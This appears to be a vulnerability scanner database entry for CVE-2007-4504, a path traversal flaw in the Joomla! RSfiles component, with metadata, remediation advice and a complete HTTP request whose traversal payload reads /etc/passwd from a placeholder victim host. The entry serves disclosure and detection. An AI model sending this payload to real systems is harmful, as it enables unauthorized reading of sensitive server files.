| Title | Joomla! RSfiles <=1.0.2 - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. |
| Remediation | Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor. |
| CVSS Score | 5 |
| EPSS Score | 0.00177 |
| CVE ID | CVE-2007-4504 |
| CWE ID | CWE-22 |
| Tags | cve2007 cve lfi edb joomla vuln |
Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2007/CVE-2007-4504.yaml
🦈 Packet Capture: ⬇️ Download cve-2007-4504.pcap
N/AN/A